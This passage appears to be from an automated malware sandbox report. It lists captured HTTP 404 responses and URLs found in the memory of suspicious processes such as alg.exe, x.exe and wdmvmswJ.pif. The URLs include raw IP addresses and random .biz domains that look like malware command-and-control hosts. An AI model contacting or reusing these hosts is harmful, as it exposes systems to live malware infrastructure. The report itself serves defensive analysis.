Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:26:41 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:26:41 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:26:41 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:26:49 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:26:49 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:26:58 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:26:58 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:27:06 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic
                HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx/1.27.2
                Date: Fri, 01 Nov 2024 07:27:08 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Keep-Alive: timeout=20
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Source: alg.exe, 00000010.00000003.2054624676.00000000005A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/wstlgiiatb
                Source: alg.exe, 00000010.00000003.2054624676.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/wstlgu6
                Source: alg.exe, 00000010.00000003.1671538833.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1644399119.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/rwebgnmbtiq&
                Source: alg.exe, 00000010.00000003.1637081830.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1644399119.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/w0
                Source: alg.exe, 00000010.00000003.2079470414.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/wstlg
                Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/wfcpepuolxclud
                Source: alg.exe, 00000010.00000003.2609194797.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2596159011.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2599209394.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/xwfedwcvhvxkiha
                Source: alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1637081830.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/E6
                Source: alg.exe, 00000010.00000003.2527920432.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2541384610.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/fwiohktfcqxxnbh
                Source: alg.exe, 00000010.00000003.2066991172.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/gs
                Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/m
                Source: alg.exe, 00000010.00000003.2066991172.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ohrgkx
                Source: alg.exe, 00000010.00000003.2066991172.00000000005A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ohrgkxatb
                Source: alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/s
                Source: alg.exe, 00000010.00000003.1634866335.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/uqcynitxoaix
                Source: alg.exe, 00000010.00000003.2066991172.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/ohrgkx
                Source: alg.exe, 00000010.00000003.1634866335.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/uqcynitxoaix
                Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
                Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/55
                Source: alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/95Z4
                Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/T
                Source: alg.exe, 00000010.00000003.1785132829.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/f
                Source: alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/gs
                Source: alg.exe, 00000010.00000003.1797911265.00000000005A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/p
                Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/pe6
                Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/pu6
                Source: alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/s
                Source: alg.exe, 00000010.00000003.1918263435.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1917843582.00000000005A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/vdvikkmvoibst
                Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/f0
                Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/p
                Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bumxkqgxu.biz/
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dwrqljrr.biz/
                Source: alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nqwjmb.biz/
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                Source: alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tbjrpv.biz/k7/pV
                Source: x.exe, 00000004.00000002.1593299514.000000007F670000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000000.1470846029.0000000000401000.00000020.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000A.00000003.1539123679.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.delphiexpert.ru
